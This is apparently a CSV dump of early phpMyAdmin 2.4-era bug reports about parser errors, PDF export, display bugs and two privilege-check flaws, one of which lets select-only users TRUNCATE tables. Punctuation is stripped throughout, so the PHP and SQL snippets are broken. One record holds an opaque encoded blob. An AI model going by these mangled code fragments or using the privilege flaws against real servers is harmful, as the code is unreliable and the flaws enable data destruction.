Original URL https sourceforge.net p phpmyadmin bugs 753 https sourceforge.net p phpmyadmin bugs 753 Original author mister x Found in version 2.4.0 rc2","bug"
"24444","7123","2.4.0 rc2) Database privileges and AllowUserDropDatabase.
The new database privileges code allows uses to drop databases even when cfg[ AllowUserDropDatabase ] is set to false if they have permissions to do so!
Original URL https sourceforge.net p phpmyadmin bugs 754 https sourceforge.net p phpmyadmin bugs 754 Original author robbat2 Found in version 2.4.0 rc2","bug"
"24444","7124","attempt to Edit field gives error amp;quot;Undefined variable goto amp;quot;.
Browse Edit Attempt to amp;quot;Edit amp;quot; any field of row gives error amp;quot;Undefined variable goto amp;quot; as result of that SQL INSERT INTO ) VALUES ); ========================== Warning Undefined variable goto in admin phpMyAdmin 2.4.0 rc2 tbl replace.php on line 34 ... ========================== Original URL https sourceforge.net p phpmyadmin bugs 755 https sourceforge.net p phpmyadmin bugs 755 Original author anonymous Found in version 2.4.0 rc2","bug"
"24444","7125","2.4.0 rc1) Adding new fields creates error.
Adding a new field produces the following SQL ALTER TABLE `person` ADD `test` VARCHAR 32 ) NOT NULL , ADD `test` VARCHAR 32 ) NOT NULL which causes a amp;quot;duplicate entry amp;quot; error.
I am using Linux Suse 8, MySQL 4.0.10 gamma, PHP 4.3.0 Greets, Lars Original URL https sourceforge.net p phpmyadmin bugs 756 https sourceforge.net p phpmyadmin bugs 756 Original author lars stecken Found in version 2.4.0 rc1","bug"
"24444","7126","2.4.0) Check priviliges doesn t work properly w MySQL 3.23.
When in Databases overview and selecting amp;quot;Check Priviliges amp;quot; the only user which is displayed is amp;quot;root amp;quot;.
Original URL https sourceforge.net p phpmyadmin bugs 757 https sourceforge.net p phpmyadmin bugs 757 Original author mister x Found in version 2.4.0","bug"
"24444","7127","PDF pages error amp;gt; Undefined font arial ce.
In the moment I want to generate PDF page I get an error Undefined font arial ce what s wrong with that?
big thx for any idea about this ) oscar Original URL https sourceforge.net p phpmyadmin bugs 758 https sourceforge.net p phpmyadmin bugs 758 Original author oscarek Found in version 2.4.0","bug"
"24444","7128","Problems when ini get ) is disabled.
My hosting service prevents the use of the function ini get ), and thows an error in the page when one script attempts to use it.
libraries ini get ) is used in common.lib.php, and I get the error immediately after login.
The problem is that the error message prevents a call to the header function to redirect to the HTML frameset, thus making access to phpmyadmin impossible.
One workaround I found was to add an amp;quot; amp;quot; sign in front of the 2 calls to ini get ) in the file common.lib.php.
And it worked !
But I don t think it would work for everyone... Jocelyn Original URL https sourceforge.net p phpmyadmin bugs 761 https sourceforge.net p phpmyadmin bugs 761 Original author jocelynflament Found in version 2.4.0","bug"
"24444","7129","Export from SQL Statement.
When I want to Export an SQL Statement as dump with the SQL Statement SELECT FROM `test` LIMIT 0 , 4 phpMyAdmin will convert the SQL Statement to SELECT FROM `test` LIMIT 0 , 4 LIMIT 3 and this will logically produce an error ...
Original URL https sourceforge.net p phpmyadmin bugs 759 https sourceforge.net p phpmyadmin bugs 759 Original author killergod2000 Found in version 2.4.0","bug"
"24444","7130","Display PDF schema 404.
Under Apache 2.0.43 MySQL 4.0.10 PHP 4.30 Windows 98 404 error when posting form on base of database main page http dante phpMyAdmin db details structure.php?lang=en iso 8859 1 amp;amp;server=1 amp;amp;db=library) for example post for form is pointed at phpMyAdmin pdf schema.php this causes a 404 under windows but not it would apear nix s nice quick and easy to fix for a change ) ) Original URL https sourceforge.net p phpmyadmin bugs 760 https sourceforge.net p phpmyadmin bugs 760 Original author cakemonster Found in version 2.4.0","bug"
"24444","7131","PDF) font bug when page too long.
when a table page is too long the table in break in 2 pages or more but the font doesn t change in the header and footer to correct this this line should be added in pdf schema on line 349 just before this amp;gt;cell ... this amp;gt;SetFont , ,14); and line 338 should be changed by this amp;gt;SetFont , B ,14); Original URL https sourceforge.net p phpmyadmin bugs 762 https sourceforge.net p phpmyadmin bugs 762 Original author mdelorme Found in version 2.4.0","bug"
"24444","7132","Create PHP Code Without PHP code.
I use the dutch version so maybe my translations don t fit the original english.
After executing a sql query, you can choose to create PHP code for the query.
When the php code is showed, you can choose to see the query without the PHP code.
When pressing that link, PhpMyAdmin tries to execute the query instead of just viewing it without PHP code.
To me it seems not to be a feature ) Original URL https sourceforge.net p phpmyadmin bugs 763 https sourceforge.net p phpmyadmin bugs 763 Original author anonymous Found in version Latest Git","bug"
"24444","7133","No SQL shown for modifying creating indexes.
The nice thing about phpMyAdmin is that every action you do, an SQL statement is show for it.
This is not done when a index is created, or modified.
However, it works fine when an index is dropped.
Original URL https sourceforge.net p phpmyadmin bugs 766 https sourceforge.net p phpmyadmin bugs 766 Original author vboctor Found in version 2.4.0","bug"
"24444","7134","Chg Field name to Date error tbl alter.php.
Prior to 2.4.0 rc 1 I could change the field name to [ Date ] or more specifically, I could change the TYPE or LENGTH of a field named [ Date ] to something else) using the change link tbl alter.php) from a database view.
Trying this now since 2.4 rc 1), I get an error, stating that amp;quot;Date amp;quot; is a reserved word and cannot be used as a field name.
However .
.
.
MYSQL documentation does not list amp;quot;Date amp;quot; as a reserved word.
See.
http www.mysql.com doc en Reserved words.html Also, I can run a SQL query like this without error CREATE TABLE cat id smallint 6) DEFAULT 0 NOT NULL, [more SQL statements], Date bigint 20) DEFAULT 0 NOT NULL, ); This has been a pain because now, to alter that field i.e.
chg its type or increase its size), I have to copy the whole table, create a new table with amp;quot;Date amp;quot; as a field etc.
and then repopulate.
I would have just changed the field name except that stupid me I hardcoded too much to do it quickly.
Original URL https sourceforge.net p phpmyadmin bugs 764 https sourceforge.net p phpmyadmin bugs 764 Original author mikeoliver Found in version 2.4.0","bug"
"24444","7135","amp;quot;Back amp;quot; link after save blows away table.
phpMyAdmin 2.4rc4 running on RedHat 7.2 server Client Windows 2000 using browsers Netscape 7.0.2 and 4.3.x, I.E.
6.0 Attempted to create a table Clicked on Save button Syntax errors reported Clicked on amp;quot;Back amp;quot; link Result I was returned to amp;quot; Create new table on database amp;quot; page rather than being returned to my large) table to make corrections.
My in progress table appears to be blown away.
100 repeatable.
Steve Rosenthal digidesign.com Original URL https sourceforge.net p phpmyadmin bugs 765 https sourceforge.net p phpmyadmin bugs 765 Original author anonymous","bug"
"24444","7136","2.4.0) User with only select privilege can empty any table.
After tinkering around with mysql 3.23.47 and phpmyadmin 2.3.3, I just moved over to mysql 4.0.10 and phpmyadmin 2.4.0 mainly to use the amp;quot;UNION amp;quot; command.
Now my problem is, a user with no privilage is able to run SQL comand TRUNCATE mytable to empty the table!
Also, as a user with no privilage, when I click on amp;quot;empty amp;quot; tab, java script runtime error occurs.
But this error does not come with admin account with complete privilages.
my configuration windows 2000 prof, apache, PHP4.3 Is it a bug or my config is not correct?
followup I started researching and managed to eliminate amp;quot;TRUNCATE amp;quot; for normal users.
Here is what I did.
inserting modified portion of drop database previlage check in amp;quot;sql.php amp;quot; as given below test for truncate command and deactivate rraman 18 2 2k2) if eregi TRUNCATE[[ space ]] , sql query)) \{ Checks if the user is a Superuser TODO set a global variable with this information loic1 optimized query result = PMA mysql query USE mysql ); if PMA mysql error )) \{ include .
header.inc.php ); PMA mysqlDie amp;quot;You have no permission to empty Table amp;quot;, , , err url); \} end if \} end if rajaraman Original URL https sourceforge.net p phpmyadmin bugs 767 https sourceforge.net p phpmyadmin bugs 767 Original author rrraman Found in version 2.4.0","bug"
"24444","7137","User with only select privilage empty any table.
After tinkering around with mysql 3.23.47 and phpmyadmin 2.3.3, I just moved over to mysql 4.0.10 and phpmyadmin 2.4.0 mainly to use the amp;quot;UNION amp;quot; command.
Now my problem is, a user with no privilage is able to run SQL comand TRUNCATE mytable to empty the table!
Also, as a user with no privilage, when I click on amp;quot;empty amp;quot; tab, java script runtime error occurs.
But this error does not come with admin account with complete privilages.
my configuration windows 2000 prof, apache, PHP4.3 Is it a bug or my config is not correct?
followup I started researching and managed to eliminate amp;quot;TRUNCATE amp;quot; for normal users.
Here is what I did.
inserting modified portion of drop database previlage check in amp;quot;sql.php amp;quot; as given below test for truncate command and deactivate rraman 18 2 2k2) if eregi TRUNCATE[[ space ]] , sql query)) \{ Checks if the user is a Superuser TODO set a global variable with this information loic1 optimized query result = PMA mysql query USE mysql ); if PMA mysql error )) \{ include .
header.inc.php ); PMA mysqlDie amp;quot;You have no permission to empty Table amp;quot;, , , err url); \} end if \} end if rajaraman Original URL https sourceforge.net p phpmyadmin bugs 768 https sourceforge.net p phpmyadmin bugs 768 Original author rrraman Found in version 2.4.0","bug"
"24444","7138","PHP3 doesn t have HTTP SERVER VARS.
So phpMyAdmin 2.4.0 php3 isn t exectable.
Original URL https sourceforge.net p phpmyadmin bugs 769 https sourceforge.net p phpmyadmin bugs 769 Original author anonymous Found in version 2.4.0","bug"
"24444","7139","bug, when saving data.
i have this table added as a zip file.
when i press amp;quot;edit amp;quot; for the line with the very long content in the field amp;quot;dgh amp;quot; TEXT) and then press amp;quot;Go amp;quot; to save the data i get an error page.
it seems like after correctly saving the data the redirection is wrong, because the changes i made are saved.
when editing a line with less content there is no problem Original URL https sourceforge.net p phpmyadmin bugs 770 https sourceforge.net p phpmyadmin bugs 770 Original author rubo77 Found in version 2.4.0 rc2","bug"
"24444","7140","Relation View and multi column keys.
I have two tables in a one to many relationship.
The primary key of ONE contains more than one column, as does the foreign key on MANY.
When I go into Relation View for MANY to link each of the foreign keys to the corresponding columns on the ONE table, all I can select for the primary key of ONE is the 1st column.
I am therefore unable to link more than 1 column in a multi column key.
Original URL https sourceforge.net p phpmyadmin bugs 771 https sourceforge.net p phpmyadmin bugs 771 Original author tonymarston Found in version 2.4.0","bug"
"24444","7141","Segfault when listing out results.
Get the same error with 2.4.0, 2.3.3 final and 2.4.1 dev.
System is Mandrake 9.1 with Apache 2.0.44, MySQL 4.0.10 and PHP 4.3.0. phpMyAdmin works fine for the most part, but causes a Segmentation Fault 11) whenever I try to view the results of a record.
This could be from just hitting the browse button or executing a query.
I originally thought this had something to do with file uploads as many were reporting similar problems.
Further examination shows that this happens when inserting data from a query as well.
It might be that the CSV file upload causes some amp;quot;fault amp;quot; somewhere that replicates.
I have of course tried getting at the data in other ways.
I can query it and list it out with simple PHP scripts as well as using Webmin, so it is something with phpMyAdmin and not MySQL.
This happens in any table I attempt to view, including things like the mysql user table.
I have not attached a DB structure since it seems program wide.
contact thecal at optonline.net Original URL https sourceforge.net p phpmyadmin bugs 772 https sourceforge.net p phpmyadmin bugs 772 Original author anonymous Found in version 2.4.0","bug"
"24444","7142","2.4.0) error on generating pdf php file not found.
When trying to generate a pdf, the page pdf schema.php isn t found becaus of the fact, that there s a slash behind this file so it s treated as an directory.
The problem is solved by deleting the slash after pdf schema.php in the file db details structure.php in line 484.
Original URL https sourceforge.net p phpmyadmin bugs 773 https sourceforge.net p phpmyadmin bugs 773 Original author anonymous Found in version 2.4.0","bug"
"24444","7143","MySQL outsmarts the config.inc.php3.
This is not a bug in common case, it s a feature.
I ll do a port forwarding from my local port 3307 to REMOTECOMPUTER on port 3306.
I want to access a DB over the internet.
I filled the config.inc.php with the appropriate and I get striked by the following error message Access denied for user root localhost Using password YES) I was very sure, I used the right password.
The solution is if your host is amp;quot;localhost amp;quot; MySQL the commandline tool mysql as well) always tries to use the socket connection for speeding up things.
And that doesn t work in this configuration with port forwarding.
If you enter amp;quot;127.0.0.1 amp;quot; as hostname, everything is right and mysql use the TCP connection.
Maybe you can put this in the FAQ.
It would have saved half an hour of my live.
B ) Original URL https sourceforge.net p phpmyadmin bugs 774 https sourceforge.net p phpmyadmin bugs 774 Original author ewasser Found in version 2.4.0","bug"
"24444","7144","sql query cannot be executed.
the following sql statement cannot be executed in the sql subpage select transaction id from transaction t, table2 ta or select t.transaction id from transaction t, table2 ta After pressing the Go Button PMA reloads the page with the SQL page and an empty input field.
select t.transaction id from transaction AS t, table2 ta After adding the AS the query can be executed.
It seems that PMA has a problem with the table name transaction, because with all other table everything worked fine.
All versions before 2.4.0 don t had this problem.
Original URL https sourceforge.net p phpmyadmin bugs 775 https sourceforge.net p phpmyadmin bugs 775 Original author j0erch Found in version 2.4.0","bug"
"24444","7145","page cannot be displayed after edit.
steps to repro Add a data record to the transaction table see 697961for table structure) click on SELECT enter a value to display a specific record click on Go click on edit button click on Go = amp;gt; The page cannot be displayed it worked in 2.3.0 Original URL https sourceforge.net p phpmyadmin bugs 776 https sourceforge.net p phpmyadmin bugs 776 Original author j0erch Found in version 2.4.0","bug"
"24444","7146","IE5 Javascript Error in Online Demo on nearly every page.
Tried surfing the online demo with IE5 and activated javascript error messages and got an error on nearly every page.
Original URL https sourceforge.net p phpmyadmin bugs 777 https sourceforge.net p phpmyadmin bugs 777 Original author anonymous Found in version Latest Git","bug"
"24444","7147","unterminated string error in tbl properties structure.php.
I have the following configuration Windows XP Professional Apache 2.0.43 PhpMyadmin 2.4 MySQL 4.0.3 beta When I open a database table via myphpadmin, 1 of 2 things consistently occur 1) the window flashes several times and when the table contents structure only, no data) is displayed there is garbage throughout the display or 2) I receive an unterminated string constant in tbl properties structure.php.
In the sql attached, the tblAppInfo will produce this error.
Original URL https sourceforge.net p phpmyadmin bugs 778 https sourceforge.net p phpmyadmin bugs 778 Original author anonymous Found in version 2.4.0","bug"
"24444","7148","2.4.0) Lack of lt;?xml ?
gt; PI.
The code of phpMyAdmin is yet in XHMTL, but the files are lacking the amp;lt;?xml ?
amp;gt; processor instructions.
Original URL https sourceforge.net p phpmyadmin bugs 779 https sourceforge.net p phpmyadmin bugs 779 Original author anonymous Found in version 2.4.0","bug"
"24444","7149","query page parser) error.
SELECT 1 XOR 1; silently fail returning 1 SELECT 1 XOR 1) AS pippo fail with Colonna sconosciuta 1XOR1 in field list unknow column 1XOR1 in field list mysql amp;gt; SELECT 1 XOR 1; | 1 XOR 1 | | 0 | 1 row in set 0.00 sec) is instead the right result, I use amp;quot;mysql 4.0.5 gamma amp;quot; Francesco Riosa info pnpitalia.it regards Original URL https sourceforge.net p phpmyadmin bugs 780 https sourceforge.net p phpmyadmin bugs 780 Original author anonymous Found in version Latest Git","bug"
"24444","7150","2.4.0) csv uploads fail if MySQL is on other host than pma.
When trying to upload a file in cvs format to a table on a MySQL Server that runs on a different host than the webserver with PHP amp;amp; PMA I recieve an errormessage saying amp;quot;Access denied for user Using password YES) amp;quot;.
PMA might need to add a LOCAL to LOAD DATA INFILE .
http www.mysql.com doc ee LOAD DATA.html) Original URL https sourceforge.net p phpmyadmin bugs 781 https sourceforge.net p phpmyadmin bugs 781 Original author anonymous Found in version 2.4.0","bug"
"24444","7151","quotes conversion problem?.
mysql 4, pretty standard table.
This query works fine using the command line mysql client DELETE FROM raw pings WHERE hostname LIKE www.faz.de ; but if I try it via PMA, it asks Voulez vous vraiment effectuer DELETE FROM raw pings WHERE hostname LIKE www.faz.de ?
which is perfectely correct, but after if fails displaying requxc4x99te SQL DELETE FROM raw pings WHERE hostname LIKE \ www.faz.de\ MySQL a rxc3xa9pondu You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near \ www.faz.de\ at line 1 It seems there is a problem somewhere... theses quotes shouldn t be backslashed, and it adds a space at the wrong place after LIKE, before the quote symbol).
simple regexp problem?
magic quotes gpc=On, magic quotes runtime=Off ) Original URL https sourceforge.net p phpmyadmin bugs 782 https sourceforge.net p phpmyadmin bugs 782 Original author swix Found in version Latest Git","bug"
"24444","7152","PDF Beziehungsschema Layout Probleme.
Alle Tabellen in Beziehungsschema werden linksbxc3xbcndig angezeigt alle in einem Platz alles ist durcheinander.
Original URL https sourceforge.net p phpmyadmin bugs 783 https sourceforge.net p phpmyadmin bugs 783 Original author anonymous Found in version 2.4.0","bug"
"24444","7153","default mime types and non existant files.
On a browse page Warning pma displaytablebody .
libraries transformations ) [function.pma displaytablebody] failed to create stream Success in home robbat2 cvs phpMyAdmin libraries display tbl.li b.php3 on line 1055 Warning pma displaytablebody ) [function.pma displaytablebody] Failed opening .
libraries transformations for inclusion include path= .
usr local lib php ) in home robbat2 cvs phpMyAdmin libraries display tbl.li b.php3 on line 1055 The column is set to mime type text plain, with no transformation selected.
Looking at the code, I think you should have a check for the existance of the file before trying to include it, but i m not sure why it came up in the first place.
Original URL https sourceforge.net p phpmyadmin bugs 784 https sourceforge.net p phpmyadmin bugs 784 Original author robbat2 Found in version Latest Git","bug"
"24444","7154","Quoted strings when PHP mbstring module is enabled.
When the PHP mbstring extension is enabled, quoted strings are not being handled correctly ERROR Unclosed quote 63 STR SQL UPDATE `languages` SET `enabled` = N WHERE `languagecode` = \ bg\ LIMIT 1; Error SQL query UPDATE `languages` SET `enabled` = N WHERE `languagecode` = \ bg\ LIMIT 1; MySQL said You have an error in your SQL syntax near \ bg\ LIMIT 1 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 785 https sourceforge.net p phpmyadmin bugs 785 Original author mbaker14 Found in version 2.3.2","bug"
"24444","7155","js validation for user password change.
I put back user details.js but rename it user password.js Original URL https sourceforge.net p phpmyadmin bugs 786 https sourceforge.net p phpmyadmin bugs 786 Original author lem9","bug"
"24444","7156","Charset conversion breaks binary data.
We should avoid somehow converting binary data in PMA mysql fetch array.
PMA mysql fetch array converts charset of transfered data when needed) and this definitely breaks all binary fields.
Any nice idea how to do this?
Original URL https sourceforge.net p phpmyadmin bugs 787 https sourceforge.net p phpmyadmin bugs 787 Original author nijel Found in version Latest Git","bug"
"24444","7157","cfg[ SQP ][ enable ] = FALSE.
= amp;gt; analyzed sql = empty Array, and result with errors.
Original URL https sourceforge.net p phpmyadmin bugs 788 https sourceforge.net p phpmyadmin bugs 788 Original author anonymous Found in version 2.4.0","bug"
"24444","7158","minor bug in tbl properties operations.php.
When displaying this page for a database... whenever you click amp;quot;Structure and data amp;quot; label... it selects amp;quot;Data only amp;quot; When looking into the HTML source, nothing surprising as two radio button the ones names amp;quot;data amp;quot; and amp;quot;dataonly amp;quot;) have the same id ie radio copy data).
So as the attached labels refer to the same id... the code to change lines 174 177) amp;lt;input type= amp;quot;radio amp;quot; name= amp;quot;what amp;quot; value= amp;quot;data amp;quot; id= amp;quot;radio copy data amp;quot; amp;gt; amp;lt;label for= amp;quot;radio copy data amp;quot; amp;gt;Structure and data amp;lt; label amp;gt; amp;amp;nbsp; amp;amp;nbsp; amp;lt;br amp;gt; amp;lt;input type= amp;quot;radio amp;quot; name= amp;quot;what amp;quot; value= amp;quot;dataonly amp;quot; id= amp;quot;radio copy data amp;quot; amp;gt; amp;lt;label for= amp;quot;radio copy data amp;quot; amp;gt;Data only amp;lt; label amp;gt; amp;amp;nbsp; amp;amp;nbsp; to lines 174 177) amp;lt;input type= amp;quot;radio amp;quot; name= amp;quot;what amp;quot; value= amp;quot;data amp;quot; id= amp;quot;radio copy data amp;quot; amp;gt; amp;lt;label for= amp;quot;radio copy data amp;quot; amp;gt;Structure and data amp;lt; label amp;gt; amp;amp;nbsp; amp;amp;nbsp; amp;lt;br amp;gt; amp;lt;input type= amp;quot;radio amp;quot; name= amp;quot;what amp;quot; value= amp;quot;dataonly amp;quot; id= amp;quot;radio copy dataonly amp;quot; amp;gt; amp;lt;label for= amp;quot;radio copy dataonly amp;quot; amp;gt;Data only amp;lt; label amp;gt; amp;amp;nbsp; amp;amp;nbsp; Original URL https sourceforge.net p phpmyadmin bugs 789 https sourceforge.net p phpmyadmin bugs 789 Original author anonymous Found in version 2.4.0","bug"
"24444","7159","cannot execute dumped file.
Mulai potong CUT) eNolj29ME3cYx2d8s3Qv7sWW8Ea9M3EzmdDS1iJ0XRtCGjQrFIGJzkmzBabNwCIVrsX27uUl1HnJ 0PCCjCZbFpKZwbQOCdW7ZDeGhplmIQgdlkvpCsOy6 WPvWt7 f3WuSdPnhffPN98vl9rZ6e904i1 aLEWHWazthuxekyLNeqbVF3dVR1VqVrOdRmxY2f6jJj72sDQZ8Pu mH1gPNz9dCVIX3tKKZVNxgw XX29XlNdrR7TNhr1BqPuFDbQP9iEWT1D2DFVm7frrM2I6dU6vdqgVX3c1YnZu2qx5lZre3ctds5a BdmcV0c8WJv9kzM2WzNmUNerOtqajZhOfVKtrevrH1V1nO7477PWXk1zUq1Ta 3qGzN7a1GzNlX 53S76hobDU11WtVrGhp4843Xc Cfby5OnFge Z4vnjD gtw23rqVItzygZr289rFr07f M3e95FJ 5wy8Y22oS GIEf92uOfghUt3NtCNwweoL0wtzdGOoyHV fLFLytcDHf4pRTrYpSdlCtNVCQ7jMwR 92BmKm0uUWEIxArigMnN8Lb lRkuTaKgLEaYMZ9yVV4mlU0eFICIlnfSiB3ek3jCoyyHg 7iJOsv 77Imn1eKcaRPLrbCIU RVZLUcnz2ybjkXXuk UHxnz0EMtAvzy2jaaYsPkMJn8cnjy6s3JVwlpAB l4j fMErBRH EPijY5daB5ur4YVynpOoh oXd9KBrH tJlRwmA3HZ8fI81CkC9QSEEWOCseFgAXs xXPoEbbI1VAkCPwKi08quJzPlFHEJZXDGpSBJUGsMStFIRAh5QwCi3GaDk4ORsktove2Y6EmzUBR 9Cxc4S49Dyo9798 mkY0pTUOoXELISW5BLWRGt 6UVrmYcFHA8OzrOlv4RJmBImoLRit5Tz zyY oUdZ2JeLHgdLu73DUogWBEYurWgEBhQyl70gF aVQqh6UnPEiCQmEg4zLG1aCBifQngzc2Ms5iA9 vrE9lAH0TE9NNJJmFHGGQqHyN3hbeJdUXn7w M nLORQ4C7wMBVkQI7SCEcsCq08RacrEGUqcVe1 67ZAOz70wZD7LRNReUZZSDmNkM8DJrMPynmX75p03RsEjstb0QSXoC2 PzIUV1HmJszwFTDJbimA TwPpOCRwKTSzUsrRBCFFWShMkOAVTxb3dtbxKbKy zAIs6eoSHI9qOyEyNnFMPl1JX99sdrVMr3F czGaNwPZkZt6 Z0D7KzaCRiNachc1BUh78P54hpLZPdikSyOe kHaWE8G4vFSb8Sz9ydgzK3azH5 crGgxdfbnUbhbibBWciSZXMGpuyIg4R5Nji pZkGayvvHR7PijSS8vtgJsL786FtZ3Ke vHThrHk 496mfwHViGhe Akhiri potong CUT) Original URL https sourceforge.net p phpmyadmin bugs 790 https sourceforge.net p phpmyadmin bugs 790 Original author anonymous Found in version Latest Git","bug"
"24444","7160","Select all checkbox) doesn t work.
If you have exacty one table in your database, the amp;quot;select all unselect all amp;quot; option which it will trigger the js function to check uncheck all the checkboxes) won t work.
Any solution for this?Many thanks Best Regards, John Foo, janhouse00 hotpop.com Original URL https sourceforge.net p phpmyadmin bugs 791 https sourceforge.net p phpmyadmin bugs 791 Original author anonymous","bug"
"24444","7161","2.5.0 dev) gzip export is twice gzipped.
When you want gzipped export, it is gzipped twice ...
I can t now find, where the problem is, but it s quite late now )) ... All other exports work okay.
Original URL https sourceforge.net p phpmyadmin bugs 792 https sourceforge.net p phpmyadmin bugs 792 Original author nijel Found in version Latest Git","bug"
"24444","7162","SELECT fails if field is BLOB.
The bug happens if I do an edit on a table where content is a BLOB.
There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unclosed quote 189 STR SQL SELECT FROM `backup` WHERE `hostid` = 4 AND `userid` = 1 AND `timestamp` = 1048372010 AND `dir` = public html lwb Materiale web old img AND `file` = dkt.gif AND `content` = GIF89a SQL query SELECT FROM `backup` WHERE `hostid` = 4 AND `userid` = 1 AND `timestamp` = 1048372010 AND `dir` = public html lwb Materiale web old img AND `file` = dkt.gif AND `content` = GIF89a MySQL said You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near GIF89a at line 1 Original URL https sourceforge.net p phpmyadmin bugs 793 https sourceforge.net p phpmyadmin bugs 793 Original author anonymous","bug"
"24444","7163","problem with host field.
Hi, This is not real bug, but i think it could change.
So the problem is in New user adding.
phpMyAdmin doesn t allow empty host field.
But if this field is empty, list of hosts is taken from mysql.host table.
And the question is how to leave this field empty ?
When I changed the host field in mysql.user table manualy and then tried to edit user in phpMyAdmin, the host field changed to , and this is not good.
And sorry for my english.
petko unitra.sk Original URL https sourceforge.net p phpmyadmin bugs 794 https sourceforge.net p phpmyadmin bugs 794 Original author anonymous Found in version 2.4.0","bug"
"24444","7164","YEAR as column type and function.
amp;quot;YEAR amp;quot; can be used as column type or as function.
As it is listed in amp;quot; cfg[ ColumnTypes ] amp;quot; it will be coloured orange as a column type).
This is not correct for i.e.
amp;quot;SELECT YEAR NOW )), MONTH NOW )) amp;quot;.
This bug is present in 2.5.0 dev, too.
Original URL https sourceforge.net p phpmyadmin bugs 795 https sourceforge.net p phpmyadmin bugs 795 Original author ci dev Found in version 2.4.0","bug"
"24444","7165","slow down when browsing big tables.
phpMyAdmin 2.4.0 is very slow when you try to browse a big table.
I did not encounter this problem with previous versions.
I use Apache 2.0.44 MySQL 4.0.12 PHP 4.3.1 Win2k SP3 If I set PHP as an Apache module, the Windows Task Manager tells me that Apache.exe uses up to 50MB then comes back down to 10MB when I go in the amp;quot;Browse amp;quot; tab of the table.
If I set PHP as a CGI, the Windows Task Manager tells me that php cgi.exe uses up to 200MB then comes back down to 8MB when I go in the amp;quot;Browse amp;quot; tab of the table.
With version 2.3.3.pl1 the memory usage barley moved and the response time was much faster.
Original URL https sourceforge.net p phpmyadmin bugs 796 https sourceforge.net p phpmyadmin bugs 796 Original author anonymous Found in version 2.4.0","bug"
"24444","7166","2.4.0) Parser and special characters.
Already tested SQL Statements with special characters??
SELECT FROM xc3x9azgxc3xbar produces a sqlparser error in sqlparser.lib.php ;O) Original URL https sourceforge.net p phpmyadmin bugs 797 https sourceforge.net p phpmyadmin bugs 797 Original author anonymous Found in version 2.4.0","bug"
"24444","7167","2.4.0) no comment field in result of SHOW KEYS.
Warning Undefined index Comment in usr home users gestion cofiq step html phpMyAdmin db datadict.php on line 107 line in question indexes info[ row[ Key name ]] [ Comment ] = row[ Comment ]; mysql 3.22.32 dosent show the comment field on show keys from table well not here at least ) Original URL https sourceforge.net p phpmyadmin bugs 798 https sourceforge.net p phpmyadmin bugs 798 Original author anonymous Found in version 2.4.0","bug"
"24444","7168","After copying table work with the new table.
When I copy a table, phpMyAdmin forwards me to the original table again.
Normally, when I copy a table, I want to change the new table afterwards.
Caused by the fact that I am sent to the original table, I already destroyed some of my data several times because I thought I was working on the new table.
My suggestion is to create an option in the configuration where you are being sent to after copying a table.
Original URL https sourceforge.net p phpmyadmin bugs 799 https sourceforge.net p phpmyadmin bugs 799 Original author sttereo3","bug"
"24444","7169","error everywhere when base name like quot;toto.titi.tata quot; dots).
Hi, I have a base name like amp;quot;toto.titi.tata amp;quot; and i have errors in exporting or viewing structure.. requxc4x99te SQL SHOW FIELDS FROM `contacts` FROM `toto.titi.tata` MySQL a rxc3xa9pondu Incorrect table name contacts I can t change the name of the database cause it has been fixed by my hosting provider...
Thanks for it Regards, Fred Original URL https sourceforge.net p phpmyadmin bugs 800 https sourceforge.net p phpmyadmin bugs 800 Original author frederes","bug"
"24444","7170","troubles browsing big tables.
Using MySQL v. 4.0.12 and phpMyAdmin 2.4.0 german localization) on an Alpha Workstation XP1000 running Tru64 Unix V5.1 we encounter the following problem Whenever we try to Browse a big table i.e.
about more than 5 Million rows) the output will not show up in the browser.
Instead we get the following error Fatal error Maximum execution time of 30 seconds exceeded in usr internet httpd htdocs phpMyAdmin 2.4.0 sql.php3 on line 414 We had a look inside sql.php and the problem seems to be related to the usage of the new SQL CALC FOUND ROWS parameter of the SELECT statement, that was introduced in MySQL 4.0 upwards.
The intended use of this parameter at least as I see it) is to be able to retreive the number of all rows produced by the select statement if NO limit 0,30 were given at the end of the statement.
Otherwise a COUNT ) would do the same job...) Clicking on the browse tab for a table and then monitoring the output of SHOW PROCESSLIST in Mysql reveals that phpMyAdmins seems to call amp;quot;SELECT SQL CALC FOUND ROWS FROM MY WONDERFUL TABLE amp;quot; without a amp;quot;LIMIT 0,30 amp;quot; at the end of the statement.
This results in all rows being transfered in the result.
Sadly, our Alpha seems to be to slow to send more than 5 Million rows back to phpMyAdmin within 30 seconds so instead we get the above error... As a side effect even for tables where the output is presented, the memory requirements of the httpd process grow quite rapidly, as it reserves space for all those results retreived.
As apache 1.3.27) apparently doesn t release reserved memory any time soon after needing it we regularly end up with a dozen httpd processes using 256 MB of memory each and the swap space dwindling quickly...
Using mysql 3.23.55 everything runs fine, but we dearly need the full text indexing amp;quot;capabilities amp;quot; of 4.0...
Original URL https sourceforge.net p phpmyadmin bugs 801 https sourceforge.net p phpmyadmin bugs 801 Original author korbig Found in version 2.4.0","bug"
"24444","7171","bad displaying delete .... when cfg[ ModifyDeleteAtRight ] is true, bgcolor and valign of right side delete has no bgcolor and valign is top ... in display tbl.lib.php in line 1325 missing amp;quot; quote) before bgcolor.
thisis original with bug echo amp;lt;td valign= amp;quot; .
bookmark go != ?
top middle ) .
bgcolor= amp;quot; .
bgcolor .
amp;quot; amp;gt; .
amp;quot;\n amp;quot;; and this is right echo amp;lt;td valign= amp;quot; .
bookmark go !
= ?
top middle ) .
amp;quot; bgcolor= amp;quot; .
bgcolor .
amp;quot; amp;gt; .
amp;quot;\n amp;quot;; ...... sorry my English .... ....
Original URL https sourceforge.net p phpmyadmin bugs 802 https sourceforge.net p phpmyadmin bugs 802 Original author anonymous Found in version Latest Git","bug"
"24444","7172","2.3.0 rc4) bug in the SQL parser.
hi, I got this message when starting an SQL query like SELECT FROM `insolv` WHERE Adresse LIKE Mxc3xbcnchen You seem to have found a bug in the SQL parser.
